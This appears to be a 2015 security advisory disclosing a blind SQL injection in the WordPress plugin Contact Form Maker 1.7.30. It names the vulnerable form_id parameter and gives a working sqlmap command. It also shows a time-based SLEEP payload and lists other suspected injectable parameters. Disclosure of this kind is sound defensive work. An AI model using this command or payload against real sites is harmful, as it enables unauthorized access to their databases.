Subject: Blind SQL injection in Contact Form Maker 1.7.30
Date: Wed, 8 Jul 2015 21:15:14 +0200

Hello, 

Plugin: Contact Form Maker 1.7.30 https://wordpress.org/plugins/contact-form-maker/

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).

1. SQL injection (get_labels_parameters())

Method: POST
Url: http://localhost/wp-admin/admin.php?page=submissions_fmc
Vulnerable parameter: form_id

Example PHP callstack:
FMModelSubmissions_fmc::get_labels_parameters   [/contact-form-maker/admin/models/FMModelSubmissions_fmc.php:201]
 wpdb::get_results 

Sqlmap verification:

sqlmap --cookie "..." --method POST --data "_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsubmissions_fmc&option=com_formmaker&task=&current_id=&asc_or_desc=desc&order_by=group_id&form_id=8&page_number=1&search_or_not=&startdate=&enddate=&ip_search=&username_search=&useremail_search="  -u http://localhost/wp-admin/admin.php?page=submissions_fmc -p form_id --dbms mysql

...
Parameter: form_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: _wp_http_referer=/wp-admin/admin.php?page=submissions_fmc&option=com_formmaker&task=&current_id=&asc_or_desc=desc&order_by=group_id&form_id=8 AND (SELECT * FROM (SELECT(SLEEP(5)))JMRJ)&page_number=1&search_or_not=&startdate=&enddate=&ip_search=&username_search=&useremail_search=
...


Other possible SQL injections (haven't time to verify them though):

FMControllerSubmissions_fmc::block_ip() parameter cid
FMControllerSubmissions_fmc::unblock_ip() parameter cid
FMModelGenerete_xml_fmc::get_data() parameter form_id

--
Regards,
Marcin Probola,